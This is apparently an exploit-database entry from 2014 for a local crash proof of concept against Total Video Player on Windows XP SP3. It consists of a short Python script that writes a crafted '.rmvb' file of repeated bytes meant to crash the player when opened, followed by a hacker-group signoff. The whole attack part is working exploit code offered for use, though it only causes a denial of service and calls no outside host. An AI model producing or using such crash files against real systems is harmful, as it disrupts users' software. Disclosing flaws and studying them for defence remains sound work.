Total Video Player Denial Of Service



EKU-ID: 3749 CVE: OSVDB-ID:
Author: JoKeR_StEx Published: 2014-01-06 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#####################################################################################################
# Total Video Player (.rmvb) Local Crash P.O.C
#####################################################################################################
# Date : 31/12/2013
# Author : JoKeR_StEx
# Software Download link : http://od.ccm2.net/www.commentcamarche.net/download/files/cnet_tvcc131_exe
# Tested 0N : WINDOWS XP SP3 
#####################################################################################################

#!/usr/bin/python 

# Crash 
buffer = "\x46\x48" * 2014 # FK # 
# File .rmvb
filename = "2014.rmvb" 
crash = buffer
file=open(filename,"w")
file.write(crash)
file.close()
if file:
	print"File Created successfully ^__^"
else: 
	print" Err0r :/ ..."

############################ <3 Happy New Year <3 #####################################################
# The Black Devils
# Dz Crazy L33ts
########################### <3 Happy New Year <3 ######################################################